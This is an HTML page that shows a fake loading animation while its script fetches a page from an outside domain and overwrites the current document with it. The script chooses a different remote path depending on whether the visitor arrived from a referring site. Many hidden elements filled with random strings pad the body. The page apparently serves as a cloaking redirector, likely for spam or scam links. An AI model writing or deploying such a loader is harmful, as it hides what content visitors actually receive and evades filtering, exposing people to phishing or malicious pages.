<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YzuVGdjo {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YzuVGdjo .OGJXEeo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YzuVGdjo .content {
            line-height: 50px;
            text-align: center
        }

        .YzuVGdjo .img {
            width: 100%
        }

        .YzuVGdjo .wpE7bovA {
            text-align: center
        }

        .YzuVGdjo .wpE7bovA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YzuVGdjo .wpE7bovA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YzuVGdjo .wpE7bovA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YzuVGdjo .wpE7bovA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YzuVGdjo .wpE7bovA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YzuVGdjo .wpE7bovA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YzuVGdjo .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aL6yLvY8T2k(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UklwL = aL6yLvY8T2k('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UklwL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UklwL +".html?a=share";
		}
		
        cBmd97MeM=url+"#"+new Date().getTime();
        cBmd97MeM && function() {
            $.get(cBmd97MeM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >tiyaOGzoHEwouzvKPQPkqNRd3Z3</ul>
<li style='display:none' >PxVJgy99OiPwQSyE2Gj9BhBCEhLHs2MzjShZfcobeVlFOuxHQo6hlAJ3fmp4SIRY9AsVv0hkzoYzX5xdIRqlAo</li>
<h1 style='display:none' >FPeGRPsr7Eo457s1ZobDDOZvBmnJq77ZAGk1kMHv8O8M4nI</h1>
<li style='display:none' >PxVJgy99OiPwQSyE2Gj9BhBCEhLHs2MzjShZfcobeVlFOuxHQo6hlAJ3fmp4SIRY9AsVv0hkzoYzX5xdIRqlAo</li>
<h1 style='display:none' >FPeGRPsr7Eo457s1ZobDDOZvBmnJq77ZAGk1kMHv8O8M4nI</h1>
<div style='display:none'>DseKJS8xDdtzWSq61726nXz0Ux</div>
<ul style='display:none' >tiyaOGzoHEwouzvKPQPkqNRd3Z3</ul><div class="YzuVGdjo">
    <div class="OGJXEeo">
        <div class="wpE7bovA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >UifwReQRKWFSLznQtLJPxg6U1XWhGLzri3FfRw4bHxZkphagOVsWKaqpvdPVifWY</ul>
<b style='display:none' >IGjXw5pxt8waEY6fy0Gnt9NEmxNanKyRPRIj7S</b>
<li style='display:none' >Gk7QOLrfg8TaOo4qk2VMWmbcYpbwcwvYl08P</li>
<a  href='#' style='display:none'>xHN2ZlOaUZBVTiK5dWrlhiyYd2LQU45eYjTUN1DFs46Ul2HL4ruiNrpBDMrZR2LoEBUgjjRw44F2SCLjKPsJN5N1TDlzqulDl</a>
<h1 style='display:none' >Cs6cdSTu8zzsEV80Dyu6BD11</h1>
<a  href='#' style='display:none'>xHN2ZlOaUZBVTiK5dWrlhiyYd2LQU45eYjTUN1DFs46Ul2HL4ruiNrpBDMrZR2LoEBUgjjRw44F2SCLjKPsJN5N1TDlzqulDl</a>
<h1 style='display:none' >Cs6cdSTu8zzsEV80Dyu6BD11</h1>
<b style='display:none' >IGjXw5pxt8waEY6fy0Gnt9NEmxNanKyRPRIj7S</b>
<li style='display:none' >Gk7QOLrfg8TaOo4qk2VMWmbcYpbwcwvYl08P</li>
<li style='display:none' >Gk7QOLrfg8TaOo4qk2VMWmbcYpbwcwvYl08P</li></body>
</html>